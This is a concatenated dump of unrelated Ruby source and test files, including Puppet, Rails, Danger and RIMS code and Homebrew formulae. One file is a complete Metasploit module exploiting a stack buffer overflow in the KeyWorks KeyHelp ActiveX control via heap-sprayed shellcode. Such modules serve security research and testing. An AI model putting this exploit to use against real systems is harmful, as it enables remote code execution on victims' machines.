Puppet.expects(:[]=).with(:ignoreimport, true)
Puppet::Util::RDoc.manifestdoc([])
end
it "should use a parser with the correct environment" do
FileTest.stubs(:file?).returns(true)
Puppet::Util::RDoc.stubs(:output)
parser = stub_everything
Puppet::Parser::Parser.stubs(:new).with{ |env| env.is_a?(Puppet::Node::Environment) }.returns(parser)
parser.expects(:file=).with("file")
parser.expects(:parse)
Puppet::Util::RDoc.manifestdoc(["file"])
end
it "should puppet parse all given files" do
FileTest.stubs(:file?).returns(true)
Puppet::Util::RDoc.stubs(:output)
parser = stub_everything
Puppet::Parser::Parser.stubs(:new).returns(parser)
parser.expects(:file=).with("file")
parser.expects(:parse)
Puppet::Util::RDoc.manifestdoc(["file"])
end
it "should call output for each parsed file" do
FileTest.stubs(:file?).returns(true)
ast = stub_everything
parser = stub_everything
Puppet::Parser::Parser.stubs(:new).returns(parser)
parser.stubs(:parse).returns(ast)
Puppet::Util::RDoc.expects(:output).with("file", ast)
Puppet::Util::RDoc.manifestdoc(["file"])
end
describe "when outputing documentation" do
it "should output doc for ast classes, nodes and definitions in order of increasing line number" do
byline = sequence('documentation outputs in line order')
Puppet::Util::RDoc.expects(:puts).with("im a class\n").in_sequence(byline)
Puppet::Util::RDoc.expects(:puts).with("im a node\n").in_sequence(byline)
Puppet::Util::RDoc.expects(:puts).with("im a define\n").in_sequence(byline)
# any other output must fail
Puppet::Util::RDoc.manifestdoc([my_fixture('basic.pp')])
end
it "should output resource documentation if needed" do
pending "#6634 being fixed"
Puppet.settings[:document_all] = true
byline = sequence('documentation outputs in line order')
Puppet::Util::RDoc.expects(:puts).with("im a class\n").in_sequence(byline)
Puppet::Util::RDoc.expects(:puts).with("im a node\n").in_sequence(byline)
Puppet::Util::RDoc.expects(:puts).with("im a define\n").in_sequence(byline)
Puppet::Util::RDoc.expects(:puts).with("im a resource\n").in_sequence(byline)
# any other output must fail
Puppet::Util::RDoc.manifestdoc([my_fixture('basic.pp')])
end
end
end
end
| 35.496732 | 123 | 0.648683 |
288660f1a6c85798db953be17f3abc251a85ec57 | 617 |
require File.dirname(__FILE__) + "/../spec_helper"
describe IceCube::StringBuilder do
describe :sentence do
it "should return empty string when none" do
expect(IceCube::StringBuilder.sentence([])).to eq("")
end
it "should return sole when one" do
expect(IceCube::StringBuilder.sentence(["1"])).to eq("1")
end
it "should split on and when two" do
expect(IceCube::StringBuilder.sentence(["1", "2"])).to eq("1 and 2")
end
it "should comma and when more than two" do
expect(IceCube::StringBuilder.sentence(["1", "2", "3"])).to eq("1, 2, and 3")
end
end
end
| 28.045455 | 83 | 0.640194 |
4a14741909bc7c79ea445f1803e44f0f9b463636 | 737 |
describe 'POST api/v1/time_entries', type: :request do
let!(:user) { create(:user) }
subject { post api_v1_time_entries_path, params: params, headers: auth_headers, as: :json }
context 'with valid params' do
let(:params) { attributes_for(:time_entry) }
it 'creates the time entry' do
expect { subject }.to change(TimeEntry, :count).by(1)
end
it 'assigns the time_entry to the logged user' do
expect { subject }.to change { user.reload.time_entries.count }.by(1)
end
end
context 'with invalid params' do
let(:params) { { minutes: 300, date: Time.zone.today.to_s } }
it 'return bad request' do
subject
expect(response).to have_http_status(:bad_request)
end
end
end
| 27.296296 | 93 | 0.668928 |
91b98f382be66007c0ae6b125308662099b33946 | 576 |
# -*- coding: utf-8 -*-
require 'rspec'
describe 'JRUBY-6863' do
let(:str) do
str = "あいうえおかきくけこ"
end
subject do
str.slice!(3..-1) # => "えおかきくけこ"
end
it 'String#index without args' do
# See http://jira.codehaus.org/browse/JRUBY-xxxx
expect(subject.index(/[^ ]/)).to eq(0)
end
it 'String#index with args' do
expect(subject.index(/[^ ]/, 2)).to eq(2)
end
it 'String#rindex without args' do
expect(subject.rindex(/[^ ]/)).to eq(6)
end
it 'String#rindex with args' do
expect(subject.rindex(/[^ ]/, 2)).to eq(2)
end
end
| 19.2 | 52 | 0.59375 |
611c6093c21d4aefbecd5604d51a542a239228be | 90 |
require 'baseline/hooks/create_site_data_pages'
module Baseline
module Hooks
end
end
| 12.857143 | 47 | 0.811111 |
abf7b4246e6c5037ee71e0c64054824903c4fe7c | 4,301 |
class ErlangAT21 < Formula
desc "Programming language for highly scalable real-time systems"
homepage "https://www.erlang.org/"
# Download tarball from GitHub; it is served faster than the official tarball.
url "https://github.com/erlang/otp/archive/OTP-21.3.8.18.tar.gz"
sha256 "3481a47503e1ac0c0296970b460d1936ee0432600f685a216608e04b2f608367"
license "Apache-2.0"
livecheck do
url :stable
regex(/^OTP[._-]v?(21(?:\.\d+)+)$/i)
end
bottle do
sha256 cellar: :any, catalina: "a45826787cfb9307d0c154eb70c5148546c02cab2791a5912568dcdc4e5645ef"
sha256 cellar: :any, mojave: "7bb6af1d1169b82bb631434d826bfbf86cf03cadb669076644710d925e596d56"
sha256 cellar: :any, high_sierra: "5ca5113bc1e1f7ccefc85b36039f8bc35f4f30c1534d3928c867afe2355d53b6"
sha256 cellar: :any, x86_64_linux: "a900ccbfb6c724dda441bbce7752b24ad1f78bc9030348ad503e226f0b849c31"
end
keg_only :versioned_formula
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on arch: :x86_64
depends_on "[email protected]"
depends_on "wxmac" # for GUI apps like observer
uses_from_macos "m4" => :build
resource "man" do
url "https://www.erlang.org/download/otp_doc_man_21.3.tar.gz"
mirror "https://fossies.org/linux/misc/otp_doc_man_21.3.tar.gz"
sha256 "f5464b5c8368aa40c175a5908b44b6d9670dbd01ba7a1eef1b366c7dc36ba172"
end
resource "html" do
url "https://www.erlang.org/download/otp_doc_html_21.3.tar.gz"
mirror "https://fossies.org/linux/misc/otp_doc_html_21.3.tar.gz"
sha256 "258b1e0ed1d07abbf08938f62c845450e90a32ec542e94455e5d5b7c333da362"
end
# Fix build on Xcode 11.4+ (https://bugs.erlang.org/browse/ERL-1205)
patch do
url "https://github.com/erlang/otp/commit/3edba0dad391431cbadad44a8bd15c75254fc239.patch?full_index=1"
sha256 "0c82d9f3bdb668ba78025988c9447bebe91a2f6bb00daa7f0ae7bd1916cd9bfd"
end
# Fix build on Xcode 12+ (https://bugs.erlang.org/browse/ERL-1306)
patch do
url "https://github.com/erlang/otp/commit/388622e9b626039c1e403b4952c2c905af364a96.patch?full_index=1"
sha256 "85d3611fc071f06d421b9c7fae00b656fde054586bf69551aec38930d4086780"
end
def install
# Unset these so that building wx, kernel, compiler and
# other modules doesn't fail with an unintelligible error.
%w[LIBS FLAGS AFLAGS ZFLAGS].each { |k| ENV.delete("ERL_#{k}") }
# Do this if building from a checkout to generate configure
system "./otp_build", "autoconf" if File.exist? "otp_build"
args = %W[
--disable-debug
--disable-silent-rules
--prefix=#{prefix}
--enable-dynamic-ssl-lib
--enable-hipe
--enable-sctp
--enable-shared-zlib
--enable-smp-support
--enable-threads
--enable-wx
--with-ssl=#{Formula["[email protected]"].opt_prefix}
--without-javac
]
on_macos do
args << "--enable-darwin-64bit"
args << "--enable-kernel-poll" if MacOS.version > :el_capitan
args << "--with-dynamic-trace=dtrace" if MacOS::CLT.installed?
end
system "./configure", *args
system "make"
system "make", "install"
(lib/"erlang").install resource("man").files("man")
doc.install resource("html")
end
def caveats
<<~EOS
Man pages can be found in:
#{opt_lib}/erlang/man
Access them with `erl -man`, or add this directory to MANPATH.
EOS
end
test do
system "#{bin}/erl", "-noshell", "-eval", "crypto:start().", "-s", "init", "stop"
(testpath/"factorial").write <<~EOS
#!#{bin}/escript
%% -*- erlang -*-
%%! -smp enable -sname factorial -mnesia debug verbose
main([String]) ->
try
N = list_to_integer(String),
F = fac(N),
io:format("factorial ~w = ~w\n", [N,F])
catch
_:_ ->
usage()
end;
main(_) ->
usage().
usage() ->
io:format("usage: factorial integer\n").
fac(0) -> 1;
fac(N) -> N * fac(N-1).
EOS
chmod 0755, "factorial"
assert_match "usage: factorial integer", shell_output("./factorial")
assert_match "factorial 42 = 1405006117752879898543142606244511569936384000000000", shell_output("./factorial 42")
end
end
| 32.832061 | 118 | 0.671239 |
1a18e4692b6805c68c3916919585218d46134bbd | 9,251 |
require "danger/danger_core/executor"
# If you cannot find a method, please check spec/support/ci_helper.rb.
RSpec.describe Danger::Executor, use: :ci_helper do
describe "#validate!" do
context "with CI + is a PR" do
it "not raises error on Bamboo" do
with_bamboo_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Bitrise" do
with_bitrise_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Buildkite" do
with_buildkite_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Circle" do
with_circle_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Codefresh" do
with_codefresh_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Drone" do
with_drone_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on GitLab CI" do
with_gitlabci_setup_and_is_a_merge_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Jenkins (GitHub)" do
with_jenkins_setup_github_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Jenkins (GitLab)" do
with_jenkins_setup_gitlab_and_is_a_merge_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Jenkins (GitLab v3)" do
with_jenkins_setup_gitlab_v3_and_is_a_merge_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Local Git Repo" do
with_localgitrepo_setup do |system_env|
ui = testing_ui
expect { described_class.new(system_env).validate!(ui) }.to raise_error(SystemExit)
expect(ui.string).to include("Not a LocalGitRepo Pull Request - skipping `danger` run")
end
end
it "not raises error on Screwdriver" do
with_screwdriver_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on Semaphore" do
with_semaphore_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on Surf" do
with_surf_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on TeamCity (GitLab)" do
with_teamcity_setup_github_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on TeamCity (GitLab)" do
with_teamcity_setup_gitlab_and_is_a_merge_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on Travis" do
with_travis_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on Xcode Server" do
with_xcodeserver_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
end
context "without CI" do
it "raises error with clear message" do
we_dont_have_ci_setup do |system_env|
expect { described_class.new(system_env).run }.to \
raise_error(SystemExit, /Could not find the type of CI for Danger to run on./)
end
end
end
context "NOT a PR" do
it "exits with clear message" do
not_a_pull_request do |system_env|
ui = testing_ui
expect { described_class.new(system_env).validate!(ui) }.to raise_error(SystemExit)
expect(ui.string).to include("Not a Travis Pull Request - skipping `danger` run")
end
end
it "raises error on GitLab CI" do
with_gitlabci_setup_and_is_not_a_merge_request do |system_env|
ui = testing_ui
expect { described_class.new(system_env).validate!(ui) }.to raise_error(SystemExit)
expect(ui.string).to include("Not a GitLabCI Merge Request - skipping `danger` run")
end
end
end
end
context "a test for SwiftWeekly #89" do
class FakeProse
attr_accessor :ignored_words
def lint_files
true
end
def check_spelling
true
end
end
module Danger
class Dangerfile
def prose
FakeProse.new
end
end
end
let!(:project_root) { Dir.pwd }
def prepare_fake_swiftweekly_repository(dir)
head_sha = base_sha = nil
Dir.chdir dir do
`echo "# SwiftWeekly" >> README.md`
`mkdir _drafts _posts`
FileUtils.cp "#{project_root}/spec/fixtures/github/Dangerfile", dir
`git init`
`git add .`
`git commit -m "first commit"`
`git remote add origin [email protected]:SwiftWeekly/swiftweekly.github.io.git`
# Create 2016-09-15-issue-38.md
`git checkout -b jp-issue-38 --quiet`
IO.write("_drafts/2016-09-15-issue-38.md", "init 2016-09-15-issue-38.md")
`git add _drafts/2016-09-15-issue-38.md`
`git commit -m "flesh out issue 38 based on suggestions from #75, #79"`
# Update 2016-09-15-issue-38.md
IO.write("_drafts/2016-09-15-issue-38.md", "update 2016-09-15-issue-38.md")
`git add _drafts/2016-09-15-issue-38.md`
`git commit -m "address first round of review feedback"`
# Move 2016-09-15-issue-38.md from _drafts/ to _posts/
`git mv _drafts/2016-09-15-issue-38.md _posts/2016-09-15-issue-38.md`
`git add .`
`git commit -m "move issue 38 to _posts"`
shas = `git log --oneline`.scan(/\b[0-9a-f]{5,40}\b/)
head_sha = shas.first
base_sha = shas.last
end
[head_sha, base_sha]
end
def pretend_we_are_in_the_travis
approval = ENV["HAS_JOSH_K_SEAL_OF_APPROVAL"]
pr = ENV["TRAVIS_PULL_REQUEST"]
slug = ENV["TRAVIS_REPO_SLUG"]
api_token = ENV["DANGER_GITHUB_API_TOKEN"]
ENV["HAS_JOSH_K_SEAL_OF_APPROVAL"] = "true"
ENV["TRAVIS_PULL_REQUEST"] = "42"
ENV["TRAVIS_REPO_SLUG"] = "danger/danger"
ENV["DANGER_GITHUB_API_TOKEN"] = "1234567890" * 4 # octokit token is of size 40
yield
ensure
ENV["HAS_JOSH_K_SEAL_OF_APPROVAL"] = approval
ENV["TRAVIS_PULL_REQUEST"] = pr
ENV["TRAVIS_REPO_SLUG"] = slug
ENV["DANGER_GITHUB_API_TOKEN"] = api_token # restore the original token
end
def to_json(raw)
JSON.parse(raw)
end
def swiftweekly_pr_89_as_json(head_sha, base_sha)
pr_json = to_json(IO.read("#{project_root}/spec/fixtures/github/swiftweekly.github.io-pulls-89.json"))
pr_json["base"]["sha"] = base_sha
pr_json["head"]["sha"] = head_sha
pr_json
end
def swiftweekly_issues_89_as_json
to_json(IO.read("#{project_root}/spec/fixtures/github/swiftweekly.github.io-issues-89.json"))
end
def swiftweekly_issue_89_comments_as_json
to_json(IO.read("#{project_root}/spec/fixtures/github/swiftweekly.github.io-issues-89-comments.json"))
end
it "works" do
Dir.mktmpdir do |dir|
Dir.chdir dir do
head_sha, base_sha = prepare_fake_swiftweekly_repository(dir)
fake_client = double("Octokit::Client")
allow(Octokit::Client).to receive(:new) { fake_client }
allow(fake_client).to receive(:pull_request) { swiftweekly_pr_89_as_json(head_sha, base_sha) }
allow(fake_client).to receive(:get) { swiftweekly_issues_89_as_json }
allow(fake_client).to receive(:issue_comments) { swiftweekly_issue_89_comments_as_json }
allow(fake_client).to receive(:delete_comment) { true }
allow(fake_client).to receive(:create_status) { true }
pretend_we_are_in_the_travis do
Danger::Executor.new(ENV).run(dangerfile_path: "Dangerfile")
end
end
end
end
after do
module Danger
class Dangerfile
undef_method :prose
end
end
end
end
end
| 34.011029 | 108 | 0.658307 |
212fd26a4b1578a77fc6e871789a3e497291dfd8 | 1,186 |
require File.expand_path("../../Abstract/abstract-php-extension", __FILE__)
class Php55Couchbase < AbstractPhp55Extension
init
homepage "https://pecl.php.net/package/couchbase"
desc "Provides fast access to documents stored in a Couchbase Server."
url "https://pecl.php.net/get/couchbase-2.0.7.tgz"
sha256 "0482757d6b29ec5b9c957b053203a75410ced519f2407e666f7ca5c180a66ff5"
head "https://github.com/couchbaselabs/php-couchbase.git"
bottle do
sha256 "cf7dd3612e37ba67a2e00f6381052017548d4b2939784d1fd87f867e1321f388" => :yosemite
sha256 "f1385be6ab91caa356c3fcb3e58c60f4214da04242b053b9bc9ea63f1f01a5bf" => :mavericks
sha256 "4f136d35d416969c954fd31b998b8d0828684e8b2904deb2b8ee17b1db180a49" => :mountain_lion
end
option "with-igbinary", "Build with igbinary support"
depends_on "libcouchbase"
def install
Dir.chdir "couchbase-#{version}" unless build.head?
ENV.universal_binary if build.universal?
args = []
args << "--prefix=#{prefix}"
args << phpconfig
safe_phpize
system "./configure", *args
system "make"
prefix.install "modules/couchbase.so"
write_config_file if build.with? "config-file"
end
end
| 31.210526 | 95 | 0.757167 |
032ef3c7444a9b28061f5fbd8143e1f60b94d3aa | 744 |
require 'spec_helper'
@os_facts
base_resources = YAML.load_file(File.dirname(__FILE__) + '/../resources/base_resources.yaml')
tpinstalls = base_resources['tp__install']
describe 'sensu.lab.psick.io' do
on_supported_os.each do |os, facts|
context "on #{os}" do
let(:facts) do
OS_FACTS.merge(facts)
end
let(:environment) { 'production' }
let(:trusted_facts) do
{
'env' => 'lab',
'zone' => 'lab',
'datacenter' => 'lab',
'role' => 'sensu'
}
end
it { is_expected.to compile.with_all_deps }
tpinstalls.each do | tpinstall |
it { is_expected.to contain_tp__install(tpinstall).with_ensure('present') }
end
end
end
end
| 25.655172 | 93 | 0.596774 |
33204d3635207f826255fb263cea6be1500ed299 | 3,307 |
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control
(KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's
Documentation ApplicationXtender 5.4.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '58423'],
[ 'BID', '36546' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Sep 29 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
html = %Q|
<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('KeyHelp.KeyCtrl.1');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 4024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.JumpURL(1, #{rand8}, "#{vname}");
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(html)
end
end
| 29.526786 | 98 | 0.573632 |
265d972fb2ece75e391d40ce946cf8cc6eab0cf9 | 1,203 |
class Ddgr < Formula
include Language::Python::Shebang
desc "DuckDuckGo from the terminal"
homepage "https://github.com/jarun/ddgr"
url "https://github.com/jarun/ddgr/archive/v1.8.1.tar.gz"
sha256 "d223a3543866e44e4fb05df487bd3eb23d80debc95f116493ed5aad0d091149e"
license "GPL-3.0"
bottle do
cellar :any_skip_relocation
sha256 "ba751df7de76dd4c286e8502cf5e46f406f1e6b1467689f98158bc92f7df42b2" => :catalina
sha256 "ba751df7de76dd4c286e8502cf5e46f406f1e6b1467689f98158bc92f7df42b2" => :mojave
sha256 "ba751df7de76dd4c286e8502cf5e46f406f1e6b1467689f98158bc92f7df42b2" => :high_sierra
sha256 "b8c024c062ce3af6dc579bf931c0e8e1b6d5d109d54068ef69f70d14e6ba64bf" => :x86_64_linux
end
depends_on "[email protected]"
def install
rewrite_shebang detected_python_shebang, "ddgr"
system "make", "install", "PREFIX=#{prefix}"
bash_completion.install "auto-completion/bash/ddgr-completion.bash"
fish_completion.install "auto-completion/fish/ddgr.fish"
zsh_completion.install "auto-completion/zsh/_ddgr"
end
test do
ENV["PYTHONIOENCODING"] = "utf-8"
assert_match "q:Homebrew", shell_output("#{bin}/ddgr --debug --noprompt Homebrew 2>&1")
end
end
| 36.454545 | 94 | 0.773067 |
7af165b68a72d0b3e47071d3a8892063f2dbce76 | 711 |
# frozen_string_literal: true
class AbrahamHistoriesController < ApplicationController
def create
@abraham_history = AbrahamHistory.new(abraham_history_params)
@abraham_history.creator_id = current_account.id
respond_to do |format|
if @abraham_history.save
format.json { render json: @abraham_history, status: :created }
else
format.json { render json: @abraham_history.errors, status: :unprocessable_entity }
end
end
end
private
# Never trust parameters from the scary internet, only allow the white list through.
def abraham_history_params
params.require(:abraham_history).permit(:controller_name, :action_name, :tour_name)
end
end
| 30.913043 | 91 | 0.73699 |
ff77b29d8960fc5f6158f03592797393a52e5b95 | 54,928 |
# -*- coding: utf-8 -*-
require 'json'
require 'net/imap'
require 'optparse'
require 'pp' if $DEBUG
require 'riser'
require 'yaml'
OptionParser.accept(JSON) do |json_data, *_|
begin
JSON.load(json_data)
rescue
raise OptionParser::InvalidArgument, json_data
end
end
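# With the JSON acceptor registered above, OptionParser can coerce an option
# argument straight into a parsed Ruby structure; a hypothetical switch would
# look like:
#
#   options.on('--imap-config=JSON_DATA', JSON) do |conf|
#     conf # already a Hash/Array, e.g. {"host"=>"localhost", "port"=>143}
#   end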
module RIMS
module Cmd
CMDs = {}
def self.command_function(method_name, description)
module_function(method_name)
method_name = method_name.to_s
unless (method_name =~ /\A cmd_/x) then
raise "invalid command function name: #{method_name}"
end
cmd_name = $'.gsub(/_/, '-')
CMDs[cmd_name] = { function: method_name.to_sym, description: description }
end
def run_cmd(args)
options = OptionParser.new
if (args.empty?) then
cmd_help(options, args)
return 1
end
cmd_name = args.shift
pp cmd_name if $DEBUG
pp args if $DEBUG
cmd_entry = CMDs[cmd_name] or raise "unknown command: #{cmd_name}. Run `#{options.program_name} help'."
options.program_name += " #{cmd_name}"
send(cmd_entry[:function], options, args)
end
module_function :run_cmd
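# Defining a new subcommand only takes a `cmd_` method plus a registration;
# command_function turns the underscores into hyphens for the CLI name. A
# hypothetical example:
#
#   def cmd_show_config(options, args)
#     options.parse!(args)
#     puts 'ok'
#     0
#   end
#   command_function :cmd_show_config, 'Show effective configuration.'
#
# The command is then listed by the help command and dispatched by run_cmd as
# `show-config`.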
def cmd_help(options, args)
show_debug_command = false
options.on('--show-debug-command', 'Show command for debug in help message. At default, debug command is hidden.') do
show_debug_command = true
end
options.parse!(args)
puts "usage: #{File.basename($0)} command options"
puts ""
puts "commands:"
w = CMDs.keys.map{|k| k.length }.max + 4
fmt = " %- #{w}s%s"
CMDs.sort_by{|cmd_name, _| cmd_name }.each do |cmd_name, cmd_entry|
if ((! show_debug_command) && (cmd_name =~ /\A debug/x)) then
next
end
puts format(fmt, cmd_name, cmd_entry[:description])
end
puts ""
puts "command help options:"
puts " -h, --help"
0
end
command_function :cmd_help, "Show this message."
def cmd_version(options, args)
options.parse!(args)
puts RIMS::VERSION
0
end
command_function :cmd_version, 'Show software version.'
class ServiceConfigChainBuilder
def initialize
@build = proc{ Service::Configuration.new }
end
def chain(&block)
parent = @build
@build = proc{ block.call(parent.call) }
self
end
def call
@build.call
end
end
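# The builder composes procs: each chain block receives the configuration
# built so far and must return it, and call evaluates the chain in the order
# the blocks were added. A small illustrative use (values are placeholders):
#
#   build = ServiceConfigChainBuilder.new
#   build.chain{|c| c.load(base_dir: '/var/lib/rims') }
#   build.chain{|c| c.load(logging: { stdout: { level: 'info' } }) }
#   config = build.call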
def make_service_config(options)
build = ServiceConfigChainBuilder.new
build.chain{|c| c.load(base_dir: Dir.getwd) }
options.summary_width = 37
log_level_list = %w[ debug info warn error fatal unknown ]
options.on('-h', '--help', 'Show this message.') do
puts options
exit
end
options.on('-f', '--config-yaml=CONFIG_FILE',
String,
"Load optional parameters from CONFIG_FILE."
) do |path|
build.chain{|c| c.load_yaml(path) }
end
options.on('-r', '--required-feature=FEATURE',
String,
"Add required feature."
) do |feature|
require(feature)
build.chain{|c| c.load(required_features: [ feature ]) }
end
options.on('-d', '--base-dir=DIR',
String,
"Directory that places log file, mailbox database, etc. default is current directory."
) do |path|
build.chain{|c| c.load(base_dir: path) }
end
options.on('--log-file=FILE',
String,
"Name of log file. default is `#{Service::DEFAULT_CONFIG.make_file_logger_params[0]}'."
) do |path|
build.chain{|c|
c.load(logger: {
file: {
path: path
}
})
}
end
options.on('-l', '--log-level=LEVEL',
log_level_list,
"Logging level (#{log_level_list.join(' ')}). default is `" +
Service::DEFAULT_CONFIG.make_file_logger_params[-1][:level] +
"'."
) do |level|
build.chain{|c|
c.load(logging: {
file: {
level: level
}
})
}
end
options.on('--log-shift-age=NUMBER',
Integer,
'Number of old log files to keep.'
) do |num|
build.chain{|c|
c.load(logging: {
file: {
shift_age: num
}
})
}
end
options.on('--log-shift-age-daily',
'Frequency of daily log rotation.'
) do
build.chain{|c|
c.load(logger: {
file: {
shift_age: 'daily'
}
})
}
end
options.on('--log-shift-age-weekly',
'Frequency of weekly log rotation.'
) do
build.chain{|c|
c.load(logger: {
file: {
shift_age: 'weekly'
}
})
}
end
options.on('--log-shift-age-monthly',
'Frequency of monthly log rotation.'
) do
build.chain{|c|
c.load(logger: {
file: {
shift_age: 'monthly'
}
})
}
end
options.on('--log-shift-size=SIZE',
Integer,
'Maximum logfile size.'
) do |size|
build.chain{|c|
c.load(logger: {
file: {
shift_size: size
}
})
}
end
options.on('-v', '--log-stdout=LEVEL',
log_level_list + %w[ quiet ],
"Stdout logging level (#{(log_level_list + %w[ quiet ]).join(' ')}). default is `" +
Service::DEFAULT_CONFIG.make_stdout_logger_params[-1][:level] +
"'."
) do |level|
if (level == 'quiet') then
level = 'unknown'
end
build.chain{|c|
c.load(logging: {
stdout: {
level: level
}
})
}
end
options.on('--protocol-log-file=FILE',
String,
"Name of log file. default is `#{Service::DEFAULT_CONFIG.make_protocol_logger_params[0]}'."
) do |path|
build.chain{|c|
c.load(logger: {
protocol: {
path: path
}
})
}
end
options.on('-p', '--protocol-log-level=LEVEL',
log_level_list,
"Logging level (#{log_level_list.join(' ')}). default is `" +
Service::DEFAULT_CONFIG.make_protocol_logger_params[-1][:level] +
"'."
) do |level|
build.chain{|c|
c.load(logging: {
protocol: {
level: level
}
})
}
end
options.on('--protocol-log-shift-age=NUMBER',
Integer,
'Number of old log files to keep.'
) do |num|
build.chain{|c|
c.load(logging: {
protocol: {
shift_age: num
}
})
}
end
options.on('--protocol-log-shift-age-daily',
'Frequency of daily log rotation.'
) do
build.chain{|c|
c.load(logger: {
protocol: {
shift_age: 'daily'
}
})
}
end
options.on('--protocol-log-shift-age-weekly',
'Frequency of weekly log rotation.'
) do
build.chain{|c|
c.load(logger: {
protocol: {
shift_age: 'weekly'
}
})
}
end
options.on('--protocol-log-shift-age-monthly',
'Frequency of monthly log rotation.'
) do
build.chain{|c|
c.load(logger: {
protocol: {
shift_age: 'monthly'
}
})
}
end
options.on('--protocol-log-shift-size=SIZE',
Integer,
'Maximum logfile size.'
) do |size|
build.chain{|c|
c.load(logger: {
protocol: {
shift_size: size
}
})
}
end
options.on('--[no-]daemonize',
"Daemonize server process. effective only with daemon command."
) do |daemonize|
build.chain{|c|
c.load(daemon: {
daemonize: daemonize
})
}
end
options.on('--[no-]daemon-debug',
"Debug daemon. effective only with daemon command."
) do |debug|
build.chain{|c|
c.load(daemon: {
debug: debug
})
}
end
options.on('--daemon-umask=UMASK',
Integer,
"Umask(2). effective only with daemon command. default is `#{'%04o' % Service::DEFAULT_CONFIG.daemon_umask}'."
) do |umask|
build.chain{|c|
c.load(daemon: {
umask: umask
})
}
end
options.on('--status-file=FILE',
String,
"Name of status file. effective only with daemon command. default is `#{Service::DEFAULT_CONFIG.status_file}'."
) do |path|
build.chain{|c|
c.load(daemon: {
status_file: path
})
}
end
options.on('--privilege-user=USER',
String,
"Privilege user name or ID for server process. effective only with daemon command."
) do |user|
build.chain{|c|
c.load(daemon: {
server_privileged_user: user
})
}
end
options.on('--privilege-group=GROUP',
String,
"Privilege group name or ID for server process. effective only with daemon command."
) do |group|
build.chain{|c|
c.load(daemon: {
server_privileged_group: group
})
}
end
options.on('-s', '--listen=HOST_PORT',
String,
